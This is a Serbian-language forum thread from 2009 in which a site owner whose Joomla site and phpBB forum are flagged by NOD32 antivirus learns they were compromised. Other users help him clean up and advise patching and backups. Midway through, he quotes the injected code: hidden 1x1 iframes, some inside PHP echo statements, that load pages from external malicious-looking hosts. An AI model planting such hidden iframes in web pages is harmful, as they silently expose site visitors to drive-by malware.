Nod32 blokira sajt

Nod32 blokira sajt

offline
  • Pridružio: 01 Apr 2006
  • Poruke: 658
  • Gde živiš: Kruševac


da li je ovo do mene ili stvarno na hostu imam ubacen virus?



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • pixxel  Male
  • Legendarni građanin
  • Pridružio: 21 Jun 2005
  • Poruke: 9091
  • Gde živiš: Tu i tamo...

Napisano: 20 Apr 2009 0:13

Proveri kod - i na coolinarici se od juce desava to (moja mama visi tamo) i ima neki iframe koji vuce na neki kineski sajt, koji protura neki pdf dokument koji je zatazen...

Dopuna: 20 Apr 2009 0:16

Da evo sad sam pogledao i kod tebe - potpuno isti sajt je u pitanju - isti iframe exploit...



offline
  • Pridružio: 01 Apr 2006
  • Poruke: 658
  • Gde živiš: Kruševac

Napisano: 20 Apr 2009 0:26

hmmmm...sajt mi je radjen u joomli, a forum mi je phpbb, tako da ne znam sta da gledam :S

i to se desilo pre jedno 20 minuta kada pocelo da mi blokira sajt kao i forum...da li postoji jos neko resenje?

Dopuna: 20 Apr 2009 20:46

sredio sam problem. u svim fajlovima od sajta kao i foruma gde se pominje index.php i index.html je ubacio ove frejmove:

echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
sinoc i danas su sve svi zalili na ove napade i tako da obevezno radite backup.

offline
  • pixxel  Male
  • Legendarni građanin
  • Pridružio: 21 Jun 2005
  • Poruke: 9091
  • Gde živiš: Tu i tamo...

Verovatno koriste neki propust u samoj joomli, pa injektuju kod. Cim izadje nova verzija, updateuj...

offline
  • Pridružio: 01 Apr 2006
  • Poruke: 658
  • Gde živiš: Kruševac

opet su mi ubacili ove frejmove na sajtu :S
nije proslo ni 3-4 sata kako sam dogao sve iz pocetka :S

offline
  • pixxel  Male
  • Legendarni građanin
  • Pridružio: 21 Jun 2005
  • Poruke: 9091
  • Gde živiš: Tu i tamo...

Pa kazem ti da koriste propust u softveru joomle. Mozes ti da brises koliko hoces, oni idu redom i vracaju, dok se ne "zaleci" taj propust... E sad, jedino ako imas neki nezavisni plugin, mozda se provlaci kroz njega...

offline
  • m4rk0  Male
  • Administrator
  • Administrator tech foruma
  • Marko Vasić
  • Gladijator - Maximus Decimus Meridius
  • Pridružio: 14 Jan 2005
  • Poruke: 15766
  • Gde živiš: Majur (Colosseum)

Salji mail joomla timu.

Ko je trenutno na forumu
 

Ukupno su 900 korisnika na forumu :: 21 registrovanih, 6 sakrivenih i 873 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: A.R.Chafee.Jr., cvrle312, Denaya, djboj, Dr.Strangelove, kokodakalo, kybonacci, ladro, loon123, Mika_NS, mikrimaus, milenko crazy north, Milos ZA, Neutral-M, nikoladim, oldtimer, Smiljke, solic, Srky Boy, Vlada1389, yrraf